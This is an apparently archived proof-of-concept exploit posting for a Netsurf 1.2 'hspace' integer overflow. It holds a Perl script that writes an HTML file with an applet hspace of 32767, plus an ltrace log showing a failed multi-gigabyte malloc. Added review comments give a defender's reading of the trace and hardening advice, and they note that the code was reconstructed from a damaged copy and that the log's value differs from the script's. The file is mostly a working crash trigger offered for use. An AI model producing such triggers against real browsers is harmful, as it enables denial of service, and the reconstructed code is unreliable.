
netsurf_hspace_intof.txt

Posted on 15 January 2009

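#!/usr/bin/perl
# netsurf_hspace_intof1.pl
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# [ltrace log -- hspace = 30000, without --sync]
#
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)      = 0x8cbda01
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)              = 0
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)                       = 0
# cairo_clip(0xb6600948, 0, 0, 0, 0)                            = 0xb6600aec
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)      = 0x8cbda01
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
# malloc(3073536192) /// HUGE MALLOC                            = NULL
# <... gdk_pixbuf_get_from_drawable resumed> )                  = 0
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
# free(0xb6600dc8)                                              = <void>
# free(0xb6600de0)                                              = <void>
#
# Adv Ref: netsurf_multiple_adv.txt
#
# Reading the trace (defender's view):
#   * The malloc() request for 3073536192 bytes fails and returns NULL.
#   * gdk_pixbuf_get_from_drawable() then returns 0, and that 0 is passed
#     straight on as the first argument of gdk_pixbuf_scale(), so the
#     failed allocation is not checked before the result is used.
#   * NOTE(review): the log was captured with hspace = 30000 while the
#     script below writes 32767; the title attributes the oversized
#     request to an integer overflow in the handling of 'hspace', but the
#     arithmetic itself is not visible here. Confirm against the advisory.
#   * Hardening direction for the renderer: range-check hspace/vspace
#     before they feed a size computation, and treat a NULL pixbuf as an
#     error instead of scaling it.
#   * Triage hint: HTML whose <applet>/<img> hspace sits at or near the
#     signed 16-bit maximum is the input pattern this file produces.
#
# What the script does: writes a three-line HTML file, whose name is the
# first command-line argument, containing one <applet> element with
# hspace="32767".
#
# NOTE(review): the copy this was restored from had lost its line breaks
# and backslashes; the "\n" escapes and the quoting of the HTML attribute
# values below are reconstructed and should be checked against the
# original posting.

use strict;
use warnings;

my $filename = $ARGV[0];

if (!defined $filename) {
    print "Usage: $0 <filename.html>\n";
    # Stop here: without this the script went on to open() an undefined name.
    exit 1;
}

my $head = "<html>\n";
# qq{} keeps the double quotes of the attribute values literal.
my $trig = qq{<applet code="test.class" hspace="32767">\n};
#my $trig = qq{<img src="test.jpg" hspace="32767">\n};
my $foot = "</html>";

my $data = $head . $trig . $foot;

# Three-argument open with a lexical handle: the mode is fixed to '>' and
# cannot be altered by characters in the user-supplied file name, which the
# previous '>' . $filename concatenation allowed.
open(my $out, '>', $filename)
    or die "Cannot open '$filename' for writing: $!\n";
print {$out} $data
    or die "Cannot write to '$filename': $!\n";
# Buffered write errors only surface at close, so check it as well.
close($out)
    or die "Cannot close '$filename': $!\n";

exit;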

 
